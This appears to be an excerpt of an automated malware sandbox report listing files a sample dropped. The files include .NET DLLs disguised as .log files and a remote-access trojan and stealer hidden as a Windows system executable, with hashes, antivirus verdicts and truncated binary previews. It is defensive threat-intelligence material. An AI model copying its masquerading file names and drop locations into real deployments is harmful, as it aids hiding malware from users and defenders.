                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\x9DTrljyyG

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\xpxA8xR8rc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\yAWK8lSrMR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ygLAnTmETA

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\yudNqMqwS6

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\zF6QXkRpJW

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\AEdPygqV.log

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 29%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: VUZeEe6Nhz.exe, Detection: malicious, Browse
                                                          • Filename: KYwOaWhyl6.exe, Detection: malicious, Browse
                                                          • Filename: HdXeCzyZD9.exe, Detection: malicious, Browse
                                                          • Filename: mElivBCOq1.exe, Detection: malicious, Browse
                                                          • Filename: RqZ4ruld94.exe, Detection: malicious, Browse
                                                          • Filename: dvfpH6JJJC.exe, Detection: malicious, Browse
                                                          • Filename: WR5wwWlTVi.exe, Detection: malicious, Browse
                                                          • Filename: NCTSgL4t0B.exe, Detection: malicious, Browse
                                                          • Filename: TJWbSGBK0I.exe, Detection: malicious, Browse
                                                          • Filename: povqqKBcoP.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\JfNMDZUx.log

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\SIVCnSke.log

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          • Antivirus: Virustotal, Detection: 41%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\admBIJoy.log

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\crpSXvpM.log

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\iGvrsCDf.log

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          • Antivirus: Virustotal, Detection: 41%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\kRRssUig.log

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\mFVAeiee.log

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 29%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....

                                                          C:\Windows\Globalization\Time Zone\eddb19405b7ce1

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):24
                                                          Entropy (8bit):4.136842188131012
                                                          Encrypted:false
                                                          SSDEEP:3:EHWWjTGyk:MvTG3
                                                          MD5:7D61F850DDE05E2E037047A2A83018D2
                                                          SHA1:488213ECA23730A85742A7B4F56F4F6B22CE12AB
                                                          SHA-256:C7849F506D6EAF4A926AECF14373E309912EA2D74F13ADE566321678C6CDE347
                                                          SHA-512:50EB05F15DCFA14B74D75842108771A74FD9E271E5172A61812A4D6420FDCA90435480C2F4F2B79A8D2AA92EC443DCC07E64C3204552C387AACB8D0B7ADDC9EF
                                                          Malicious:false
                                                          Preview:czCincu5t6YFUW3IRrt06cWA

                                                          C:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.963061730637048
                                                          Encrypted:false
                                                          SSDEEP:48:6RJbPtPaM7Jt8Bs3FJsdcV4MKe27CFxPsvqBH+OulajfqXSfbNtm:EPpHPc+Vx9MCrUvkYcjRzNt
                                                          MD5:4788148707AB5BF3822FC2EF781B81D5
                                                          SHA1:0463F866A84DC4DF855EFD18FE3B5EB0CFA02214
                                                          SHA-256:AE09D3D7E50AC634E247FD61981EF7756C8BB217517046168929D20A5FBAEF2B
                                                          SHA-512:5FF98CBF7E431DC32726CB789134B5657165C97676627DCDF9F3E351E31E772FD038B0746AF38E7A832684E588B3DFF243B0C7338F95A7E1C794A2C9BA2F5D6E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
